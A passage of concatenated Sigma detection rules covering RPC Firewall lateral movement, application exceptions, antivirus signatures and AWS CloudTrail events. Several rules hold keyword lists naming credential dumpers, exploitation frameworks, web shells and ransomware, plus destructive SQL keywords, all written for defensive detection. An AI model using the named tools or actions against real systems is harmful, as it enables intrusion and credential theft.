rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml ================================================ title: Remote Registry Lateral Movement id: 35c55673-84ca-4e99-8d09-e334f3c29539 status: test description: Detects remote RPC calls to modify the registry and possible execute code references: - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78 - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md - https://github.com/zeronetworks/rpcfirewall - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ author: Sagie Dulce, Dekel Paz date: 2022-01-01 tags: - attack.defense-evasion - attack.lateral-movement - attack.t1112 - attack.persistence logsource: product: rpc_firewall category: application definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:338cd001-2244-31f1-aaaa-900038001003"' detection: selection: EventLog: RPCFW EventID: 3 InterfaceUuid: 338cd001-2244-31f1-aaaa-900038001003 OpNum: - 6 - 7 - 8 - 13 - 18 - 19 - 21 - 22 - 23 - 35 condition: selection falsepositives: - Remote administration of registry values level: high ================================================ FILE: rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml ================================================ title: Remote Registry Recon id: d8ffe17e-04be-4886-beb9-c1dd1944b9a8 status: test description: Detects remote RPC calls to collect information references: - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78 - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md - https://github.com/zeronetworks/rpcfirewall - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ author: Sagie Dulce, Dekel Paz date: 2022-01-01 
tags: - attack.discovery logsource: product: rpc_firewall category: application definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:338cd001-2244-31f1-aaaa-900038001003"' detection: selection: EventLog: RPCFW EventID: 3 InterfaceUuid: 338cd001-2244-31f1-aaaa-900038001003 filter: OpNum: - 6 - 7 - 8 - 13 - 18 - 19 - 21 - 22 - 23 - 35 condition: selection and not filter falsepositives: - Remote administration of registry values level: high ================================================ FILE: rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml ================================================ title: Remote Server Service Abuse id: b6ea3cc7-542f-43ef-bbe4-980fbed444c7 status: test description: Detects remote RPC calls to possibly abuse the remote Server Service (e.g. share management) via MS-SRVS references: - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9 - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md - https://github.com/zeronetworks/rpcfirewall - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ author: Sagie Dulce, Dekel Paz date: 2022-01-01 tags: - attack.lateral-movement logsource: product: rpc_firewall category: application definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:4b324fc8-1670-01d3-1278-5a47bf6ee188"' detection: selection: EventLog: RPCFW EventID: 3 InterfaceUuid: 4b324fc8-1670-01d3-1278-5a47bf6ee188 condition: selection falsepositives: - Legitimate remote share creation level: high ================================================ FILE: rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml ================================================ title: Remote Server Service Abuse for Lateral Movement id: 10018e73-06ec-46ec-8107-9172f1e04ff2 status: test 
description: Detects remote RPC calls to possibly abuse the remote Service Control Manager via MS-SCMR references: - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9 - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md - https://github.com/zeronetworks/rpcfirewall - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ author: Sagie Dulce, Dekel Paz date: 2022-01-01 tags: - attack.lateral-movement - attack.execution - attack.t1569.002 logsource: product: rpc_firewall category: application definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:367abb81-9844-35f1-ad32-98f038001003"' detection: selection: EventLog: RPCFW EventID: 3 InterfaceUuid: 367abb81-9844-35f1-ad32-98f038001003 condition: selection falsepositives: - Administrative tasks on remote services level: high ================================================ FILE: rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml ================================================ title: Remote Schedule Task Lateral Movement via SASec id: aff229ab-f8cd-447b-b215-084d11e79eb0 status: test description: Detects remote RPC calls to create or execute a scheduled task via SASec references: - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931 - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md - https://github.com/zeronetworks/rpcfirewall - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ author: Sagie Dulce, Dekel Paz date: 2022-01-01 tags: - attack.privilege-escalation - attack.lateral-movement - attack.execution - attack.persistence - attack.t1053 - attack.t1053.002 logsource: product: rpc_firewall category: application definition: 'Requirements: install and apply the 
RPC Firewall to all processes with "audit:true action:block uuid:378e52b0-c0a9-11cf-822d-00aa0051e40f"' detection: selection: EventLog: RPCFW EventID: 3 InterfaceUuid: 378e52b0-c0a9-11cf-822d-00aa0051e40f OpNum: - 0 - 1 condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml ================================================ title: Recon Activity via SASec id: 0a3ff354-93fc-4273-8a03-1078782de5b7 status: test description: Detects remote RPC calls to read information about scheduled tasks via SASec references: - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931 - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md - https://github.com/zeronetworks/rpcfirewall - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ author: Sagie Dulce, Dekel Paz date: 2022-01-01 tags: - attack.discovery logsource: product: rpc_firewall category: application definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:378e52b0-c0a9-11cf-822d-00aa0051e40f"' detection: selection: EventLog: RPCFW EventID: 3 InterfaceUuid: 378e52b0-c0a9-11cf-822d-00aa0051e40f filter: OpNum: - 0 - 1 condition: selection and not filter falsepositives: - Unknown level: high ================================================ FILE: rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml ================================================ title: SharpHound Recon Account Discovery id: 65f77b1e-8e79-45bf-bb67-5988a8ce45a5 status: test description: Detects remote RPC calls used by SharpHound to map remote connections and local group membership. 
references: - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3 - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md - https://github.com/zeronetworks/rpcfirewall - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ author: Sagie Dulce, Dekel Paz date: 2022-01-01 tags: - attack.t1087 - attack.discovery logsource: product: rpc_firewall category: application definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:6bffd098-a112-3610-9833-46c3f87e345a opnum:2"' detection: selection: EventLog: RPCFW EventID: 3 InterfaceUuid: 6bffd098-a112-3610-9833-46c3f87e345a OpNum: 2 condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml ================================================ title: SharpHound Recon Sessions id: 6d580420-ff3f-4e0e-b6b0-41b90c787e28 status: test description: Detects remote RPC calls used by SharpHound to map remote connections and local group membership. 
references: - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183 - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md - https://github.com/zeronetworks/rpcfirewall - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/ author: Sagie Dulce, Dekel Paz date: 2022-01-01 tags: - attack.discovery - attack.t1033 logsource: product: rpc_firewall category: application definition: 'Requirements: install and apply the RPC Firewall to all processes with "audit:true action:block uuid:4b324fc8-1670-01d3-1278-5a47bf6ee188 opnum:12' detection: selection: EventLog: RPCFW EventID: 3 InterfaceUuid: 4b324fc8-1670-01d3-1278-5a47bf6ee188 OpNum: 12 condition: selection falsepositives: - Unknown level: high ================================================ FILE: rules/application/ruby/appframework_ruby_on_rails_exceptions.yml ================================================ title: Ruby on Rails Framework Exceptions id: 0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a status: stable description: Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts references: - http://edgeguides.rubyonrails.org/security.html - http://guides.rubyonrails.org/action_controller_overview.html - https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception - https://github.com/rails/rails/blob/cd08e6bcc4cd8948fe01e0be1ea0c7ca60373a25/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb author: Thomas Patzke date: 2017-08-06 modified: 2020-09-01 tags: - attack.initial-access - attack.t1190 logsource: category: application product: ruby_on_rails detection: keywords: - ActionController::InvalidAuthenticityToken - ActionController::InvalidCrossOriginRequest - ActionController::MethodNotAllowed - ActionController::BadRequest - ActionController::ParameterMissing condition: keywords falsepositives: - Application bugs 
level: medium ================================================ FILE: rules/application/spring/spring_application_exceptions.yml ================================================ title: Spring Framework Exceptions id: ae48ab93-45f7-4051-9dfe-5d30a3f78e33 status: stable description: Detects suspicious Spring framework exceptions that could indicate exploitation attempts references: - https://docs.spring.io/spring-security/site/docs/current/api/overview-tree.html author: Thomas Patzke date: 2017-08-06 modified: 2020-09-01 tags: - attack.initial-access - attack.t1190 logsource: category: application product: spring detection: keywords: - AccessDeniedException - CsrfException - InvalidCsrfTokenException - MissingCsrfTokenException - CookieTheftException - InvalidCookieException - RequestRejectedException condition: keywords falsepositives: - Application bugs level: medium ================================================ FILE: rules/application/spring/spring_spel_injection.yml ================================================ title: Potential SpEL Injection In Spring Framework id: e9edd087-89d8-48c9-b0b4-5b9bb10896b8 status: test description: Detects potential SpEL Injection exploitation, which may lead to RCE. 
references: - https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection - https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs author: Moti Harmats date: 2023-02-11 tags: - attack.initial-access - attack.t1190 logsource: category: application product: spring definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)' detection: keywords: - 'org.springframework.expression.ExpressionException' condition: keywords falsepositives: - Application bugs level: high ================================================ FILE: rules/application/sql/app_sqlinjection_errors.yml ================================================ title: Suspicious SQL Error Messages id: 8a670c6d-7189-4b1c-8017-a417ca84a086 status: test description: Detects SQL error messages that indicate probing for an injection attack references: - http://www.sqlinjection.net/errors author: Bjoern Kimminich date: 2017-11-27 modified: 2023-02-12 tags: - attack.initial-access - attack.t1190 logsource: category: application product: sql definition: 'Requirements: application error logs must be collected (with LOG_LEVEL ERROR and above)' detection: keywords: # Oracle - quoted string not properly terminated # MySQL - You have an error in your SQL syntax # SQL Server - Unclosed quotation mark # SQLite - 'near "*": syntax error' - SELECTs to the left and right of UNION do not have the same number of result columns condition: keywords falsepositives: - A syntax error in MySQL also occurs in non-dynamic (safe) queries if there is an empty in() clause, that may often be the case. 
level: high ================================================ FILE: rules/application/velocity/velocity_ssti_injection.yml ================================================ title: Potential Server Side Template Injection In Velocity id: 16c86189-b556-4ee8-b4c7-7e350a195a4f status: test description: Detects exceptions in velocity template renderer, this most likely happens due to dynamic rendering of user input and may lead to RCE. references: - https://antgarsil.github.io/posts/velocity/ - https://www.wix.engineering/post/threat-and-vulnerability-hunting-with-application-server-error-logs author: Moti Harmats date: 2023-02-11 tags: - attack.initial-access - attack.t1190 logsource: category: application product: velocity definition: 'Requirements: application error logs must be collected (with LOG_LEVEL=ERROR and above)' detection: keywords: - 'ParseErrorException' - 'VelocityException' - 'TemplateInitException' condition: keywords falsepositives: - Application bugs - Missing .vm files level: high ================================================ FILE: rules/category/antivirus/av_exploiting.yml ================================================ title: Antivirus Exploitation Framework Detection id: 238527ad-3c2c-4e4f-a1f6-92fd63adb864 status: stable description: | Detects a highly relevant Antivirus alert that reports an exploitation framework. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place. 
references: - https://www.nextron-systems.com/?s=antivirus - https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797 - https://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424 - https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466 author: Florian Roth (Nextron Systems), Arnim Rupp date: 2018-09-09 modified: 2024-11-02 tags: - attack.execution - attack.t1203 - attack.command-and-control - attack.t1219.002 logsource: category: antivirus detection: selection: Signature|contains: - 'Backdoor.Cobalt' - 'Brutel' - 'BruteR' - 'CobaltStr' - 'CobaltStrike' - 'COBEACON' - 'Cometer' - 'Exploit.Script.CVE' - 'IISExchgSpawnCMD' - 'Metasploit' - 'Meterpreter' - 'MeteTool' - 'Mpreter' - 'MsfShell' - 'PowerSploit' - 'Razy' - 'Rozena' - 'Sbelt' - 'Seatbelt' - 'Sliver' - 'Swrort' condition: selection falsepositives: - Unlikely level: critical ================================================ FILE: rules/category/antivirus/av_hacktool.yml ================================================ title: Antivirus Hacktool Detection id: fa0c05b6-8ad3-468d-8231-c1cbccb64fba status: stable description: | Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place. references: - https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/ - https://www.nextron-systems.com/?s=antivirus author: Florian Roth (Nextron Systems), Arnim Rupp date: 2021-08-16 modified: 2024-11-02 tags: - attack.execution - attack.t1204 logsource: category: antivirus detection: selection: - Signature|startswith: - 'ATK/' # Sophos - 'Exploit.Script.CVE' - 'HKTL' - 'HTOOL' - 'PWS.' - 'PWSX' - 'SecurityTool' # - 'FRP.' 
- Signature|contains: - 'Adfind' - 'Brutel' - 'BruteR' - 'Cobalt' - 'COBEACON' - 'Cometer' - 'DumpCreds' - 'FastReverseProxy' - 'Hacktool' - 'Havoc' - 'Impacket' - 'Keylogger' - 'Koadic' - 'Mimikatz' - 'Nighthawk' - 'PentestPowerShell' - 'Potato' - 'PowerSploit' - 'PowerSSH' - 'PshlSpy' - 'PSWTool' - 'PWCrack' - 'PWDump' - 'Rozena' - 'Rusthound' - 'Sbelt' - 'Seatbelt' - 'SecurityTool' - 'SharpDump' - 'SharpHound' - 'Shellcode' - 'Sliver' - 'Snaffler' - 'SOAPHound' - 'Splinter' - 'Swrort' - 'TurtleLoader' condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/category/antivirus/av_password_dumper.yml ================================================ title: Antivirus Password Dumper Detection id: 78cc2dd2-7d20-4d32-93ff-057084c38b93 status: stable description: | Detects a highly relevant Antivirus alert that reports a password dumper. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place. references: - https://www.nextron-systems.com/?s=antivirus - https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619 - https://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448 author: Florian Roth (Nextron Systems), Arnim Rupp date: 2018-09-09 modified: 2024-11-02 tags: - attack.credential-access - attack.t1003 - attack.t1558 - attack.t1003.001 - attack.t1003.002 logsource: category: antivirus detection: selection: - Signature|startswith: 'PWS' - Signature|contains: - 'Certify' - 'DCSync' - 'DumpCreds' - 'DumpLsass' - 'DumpPert' - 'HTool/WCE' - 'Kekeo' - 'Lazagne' - 'LsassDump' - 'Mimikatz' - 'MultiDump' - 'Nanodump' - 'NativeDump' - 'Outflank' - 'PShlSpy' - 'PSWTool' - 'PWCrack' - 'PWDump' - 'PWS.' - 'PWSX' - 'pypykatz' - 'Rubeus' - 'SafetyKatz' - 'SecurityTool' - 'SharpChrome' - 'SharpDPAPI' - 'SharpDump' - 'SharpKatz' - 'SharpS.' # Sharpsploit, e.g. 
530ea2ff9049f5dfdfa0a2e9c27c2e3c0685eb6cbdf85370c20a7bfae49f592d - 'ShpKatz' - 'TrickDump' condition: selection falsepositives: - Unlikely level: critical ================================================ FILE: rules/category/antivirus/av_ransomware.yml ================================================ title: Antivirus Ransomware Detection id: 4c6ca276-d4d0-4a8c-9e4c-d69832f8671f status: test description: | Detects a highly relevant Antivirus alert that reports ransomware. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place. references: - https://www.nextron-systems.com/?s=antivirus - https://www.virustotal.com/gui/file/43b0f7872900bd234975a0877744554f4f355dc57505517abd1ef611e1ce6916 - https://www.virustotal.com/gui/file/c312c05ddbd227cbb08958876df2b69d0f7c1b09e5689eb9d93c5b357f63eff7 - https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045 - https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d - https://www.virustotal.com/gui/file/69fe77dd558e281621418980040e2af89a2547d377d0f2875502005ce22bc95c - https://www.virustotal.com/gui/file/6f0f20da34396166df352bf301b3c59ef42b0bc67f52af3d541b0161c47ede05 author: Florian Roth (Nextron Systems), Arnim Rupp date: 2022-05-12 modified: 2024-11-02 tags: - attack.t1486 - attack.impact logsource: category: antivirus detection: selection: Signature|contains: - 'BlackWorm' - 'Chaos' - 'Cobra' - 'ContiCrypt' - 'Crypter' - 'CRYPTES' - 'Cryptor' - 'CylanCrypt' - 'DelShad' - 'Destructor' - 'Filecoder' - 'GandCrab' - 'GrandCrab' - 'Haperlock' - 'Hiddentear' - 'HydraCrypt' - 'Krypt' - 'Lockbit' - 'Locker' - 'Mallox' - 'Phobos' - 'Ransom' - 'Ryuk' - 'Ryzerlo' - 'Stopcrypt' - 'Tescrypt' - 'TeslaCrypt' - 'WannaCry' - 'Xorist' condition: selection falsepositives: - Unlikely level: critical ================================================ FILE: 
rules/category/antivirus/av_relevant_files.yml ================================================ title: Antivirus Relevant File Paths Alerts id: c9a88268-0047-4824-ba6e-4d81ce0b907c status: test description: | Detects an Antivirus alert in a highly relevant file path or with a relevant file name. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place. references: - https://www.nextron-systems.com/?s=antivirus author: Florian Roth (Nextron Systems), Arnim Rupp date: 2018-09-09 modified: 2024-11-02 tags: - attack.resource-development - attack.t1588 logsource: category: antivirus detection: selection_path: Filename|contains: - ':\PerfLogs\' - ':\Temp\' - ':\Users\Default\' - ':\Users\Public\' - ':\Windows\' - '/www/' # - '\Client\' - '\inetpub\' - '\tsclient\' - 'apache' - 'nginx' - 'tomcat' - 'weblogic' selection_ext: Filename|endswith: - '.asax' - '.ashx' - '.asmx' - '.asp' - '.aspx' - '.bat' - '.cfm' - '.cgi' - '.chm' - '.cmd' - '.dat' - '.ear' - '.gif' - '.hta' - '.jpeg' - '.jpg' - '.jsp' - '.jspx' - '.lnk' - '.msc' - '.php' - '.pl' - '.png' - '.ps1' - '.psm1' - '.py' - '.pyc' - '.rb' - '.scf' - '.sct' - '.sh' - '.svg' - '.txt' - '.vbe' - '.vbs' - '.war' - '.wll' - '.wsf' - '.wsh' - '.xll' - '.xml' condition: 1 of selection_* falsepositives: - Unlikely level: high ================================================ FILE: rules/category/antivirus/av_webshell.yml ================================================ title: Antivirus Web Shell Detection id: fdf135a2-9241-4f96-a114-bb404948f736 status: test description: | Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big WebShell repository from e.g. github and checking the matches. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place. 
references: - https://www.nextron-systems.com/?s=antivirus - https://github.com/tennc/webshell - https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection - https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection - https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection - https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection - https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection - https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection - https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection - https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection author: Florian Roth (Nextron Systems), Arnim Rupp date: 2018-09-09 modified: 2024-11-02 tags: - attack.persistence - attack.t1505.003 logsource: category: antivirus detection: selection: - Signature|startswith: - 'ASP.' - 'IIS/BackDoor' - 'JAVA/Backdoor' - 'JSP.' - 'Perl.' - 'PHP.' 
- 'Troj/ASP' - 'Troj/JSP' - 'Troj/PHP' - 'VBS/Uxor' # looking for 'VBS/' would also find downloaders and droppers meant for desktops - Signature|contains: - 'ASP_' # looking for 'VBS_' would also find downloaders and droppers meant for desktops - 'ASP:' - 'ASP.Agent' - 'ASP/' # - 'ASP/Agent' - 'Aspdoor' - 'ASPXSpy' - 'Backdoor.ASP' - 'Backdoor.Java' - 'Backdoor.JSP' - 'Backdoor.PHP' - 'Backdoor.VBS' - 'Backdoor/ASP' - 'Backdoor/Java' - 'Backdoor/JSP' - 'Backdoor/PHP' - 'Backdoor/VBS' - 'C99shell' - 'Chopper' - 'filebrowser' - 'JSP_' - 'JSP:' - 'JSP.Agent' - 'JSP/' # - 'JSP/Agent' - 'Perl:' - 'Perl/' - 'PHP_' - 'PHP:' - 'PHP.Agent' - 'PHP/' # - 'PHP/Agent' - 'PHPShell' - 'PShlSpy' - 'SinoChoper' - 'Trojan.ASP' - 'Trojan.JSP' - 'Trojan.PHP' - 'Trojan.VBS' - 'VBS.Agent' - 'VBS/Agent' - 'Webshell' condition: selection falsepositives: - Unlikely level: high ================================================ FILE: rules/category/database/db_anomalous_query.yml ================================================ title: Suspicious SQL Query id: d84c0ded-edd7-4123-80ed-348bb3ccc4d5 status: test description: Detects suspicious SQL query keywords that are often used during recon, exfiltration or destructive activities. 
Such as dropping tables and selecting wildcard fields author: '@juju4' date: 2022-12-27 references: - https://github.com/sqlmapproject/sqlmap tags: - attack.exfiltration - attack.initial-access - attack.privilege-escalation - attack.persistence - attack.t1190 - attack.t1505.001 logsource: category: database definition: 'Requirements: Must be able to log the SQL queries' detection: keywords: - 'drop' - 'truncate' - 'dump' - 'select \*' condition: keywords falsepositives: - Inventory and monitoring activity - Vulnerability scanners - Legitimate applications level: medium ================================================ FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_bucket_deleted.yml ================================================ title: AWS Bucket Deleted id: 39c9f26d-6e3b-4dbb-9c7a-4154b0281112 status: experimental description: | Detects the deletion of S3 buckets in AWS CloudTrail logs. Monitoring the deletion of S3 buckets is critical for security and data integrity, as it may indicate potential data loss or unauthorized access attempts. references: - https://docs.aws.amazon.com/AmazonS3/latest/API/API_DeleteBucket.html - https://awscli.amazonaws.com/v2/documentation/api/latest/reference/s3api/delete-bucket.html author: Ivan Saakov, Nasreddine Bencherchali date: 2025-10-19 tags: - attack.defense-evasion logsource: product: aws service: cloudtrail detection: selection_event_name: eventName: 'DeleteBucket' selection_status_success: errorCode: 'Success' selection_status_null: errorCode: null condition: selection_event_name and 1 of selection_status_* falsepositives: - During maintenance operations or testing, authorized administrators may delete S3 buckets as part of routine data management or cleanup activities. 
level: medium ================================================ FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_console_login_failed_authentication.yml ================================================ title: AWS ConsoleLogin Failed Authentication id: 6393e346-1977-46ef-8987-ad414a145fad status: experimental description: | Detects failed AWS console login attempts due to authentication failures. Monitoring these events is crucial for identifying potential brute-force attacks or unauthorized access attempts to AWS accounts. references: - https://naikordian.github.io/blog/posts/brute-force-aws-console/ - https://help.fortinet.com/fsiem/Public_Resource_Access/7_2_1/rules/PH_RULE_AWS_Management_Console_Brute_Force_of_Root_User_Identity.htm - https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1110.001/aws_login_failure/aws_cloudtrail_events.json author: Ivan Saakov, Nasreddine Bencherchali date: 2025-10-19 tags: - attack.credential-access - attack.t1110 logsource: product: aws service: cloudtrail detection: selection: eventName: 'ConsoleLogin' errorMessage: 'Failed authentication' condition: selection falsepositives: - Legitimate failed login attempts by authorized users. Investigate the source of repeated failed login attempts. level: medium ================================================ FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_console_login_success_without_mfa.yml ================================================ title: AWS Successful Console Login Without MFA id: 77caf516-34e5-4df9-b4db-20744fea0a60 status: experimental description: | Detects successful AWS console logins that were performed without Multi-Factor Authentication (MFA). This alert can be used to identify potential unauthorized access attempts, as logging in without MFA can indicate compromised credentials or misconfigured security settings. 
references: - https://securitylabs.datadoghq.com/cloud-security-atlas/vulnerabilities/iam-user-without-mfa/ - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-event-reference-aws-console-sign-in-events.html author: Thuya@Hacktilizer, Ivan Saakov date: 2025-10-18 modified: 2025-10-21 tags: - attack.initial-access - attack.defense-evasion - attack.persistence - attack.privilege-escalation - attack.t1078.004 logsource: product: aws service: cloudtrail detection: selection: eventName: 'ConsoleLogin' additionalEventData.MFAUsed: 'NO' responseElements.ConsoleLogin: 'Success' condition: selection falsepositives: - Unlikely level: medium ================================================ FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_disable_logging.yml ================================================ title: AWS CloudTrail Important Change id: 4db60cc0-36fb-42b7-9b58-a5b53019fb74 status: test description: Detects disabling, deleting and updating of a Trail references: - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/best-practices-security.html author: vitaliy0x1 date: 2020-01-21 modified: 2022-10-09 tags: - attack.defense-evasion - attack.t1562.008 logsource: product: aws service: cloudtrail detection: selection_source: eventSource: cloudtrail.amazonaws.com eventName: - StopLogging - UpdateTrail - DeleteTrail condition: selection_source falsepositives: - Valid change in a Trail level: medium ================================================ FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_guardduty_detector_deleted_or_updated.yml ================================================ title: AWS GuardDuty Detector Deleted Or Updated id: d2656e78-c069-4571-8220-9e0ab5913f19 status: experimental description: | Detects successful deletion or disabling of an AWS GuardDuty detector, possibly by an attacker trying to avoid detection of its malicious activities. Upon deletion, GuardDuty stops monitoring the environment and all existing findings are lost. 
Verify with the user identity that this activity is legitimate. references: - https://docs.aws.amazon.com/guardduty/latest/APIReference/API_DeleteDetector.html - https://docs.aws.amazon.com/guardduty/latest/APIReference/API_UpdateDetector.html - https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_suspend-disable.html - https://docs.datadoghq.com/security/default_rules/719-39f-9cd/ - https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-guardduty-detector-is-enabled - https://docs.stellarcyber.ai/5.2.x/Using/ML/Alert-Rule-Based-Potentially_Malicious_AWS_Activity.html - https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Amazon%20Web%20Services/Analytic%20Rules/AWS_GuardDutyDisabled.yaml - https://github.com/elastic/detection-rules/blob/main/rules/integrations/aws/defense_evasion_guardduty_detector_deletion.toml - https://help.fortinet.com/fsiem/Public_Resource_Access/7_4_0/rules/PH_RULE_AWS_GuardDuty_Detector_Deletion.htm - https://research.splunk.com/sources/5d8bd475-c8bc-4447-b27f-efa508728b90/ - https://suktech24.com/2025/07/17/aws-threat-detection-rule-guardduty-detector-disabled-or-suspended/ - https://www.atomicredteam.io/atomic-red-team/atomics/T156001#atomic-test-46---aws---guardduty-suspension-or-deletion author: suktech24 date: 2025-11-27 tags: - attack.defense-evasion - attack.t1562.001 - attack.t1562.008 logsource: product: aws service: cloudtrail detection: selection_event_source: eventSource: 'guardduty.amazonaws.com' selection_action_delete: eventName: 'DeleteDetector' selection_action_update: eventName: 'UpdateDetector' requestParameters.enable: 'false' selection_status_success: errorCode: 'Success' selection_status_null: errorCode: null condition: selection_event_source and 1 of selection_action_* and 1 of selection_status_* falsepositives: - Legitimate detector deletion by an admin (e.g., during account decommissioning). 
- Temporary disablement for troubleshooting (verify via change management tickets).
- Automated deployment tools (e.g. Terraform) managing GuardDuty state.
level: high
================================================
FILE: rules/cloud/aws/cloudtrail/aws_cloudtrail_imds_malicious_usage.yml
================================================
title: Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure
id: 352a918a-34d8-4882-8470-44830c507aa3
status: test
description: |
    Detects when an EC2 instance identity role (an assumed-role/aws:... ARN) performs an API action outside of SSM. This can indicate that a compromised EC2 instance is being used as a pivot point.
references:
    - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-identity-roles.html
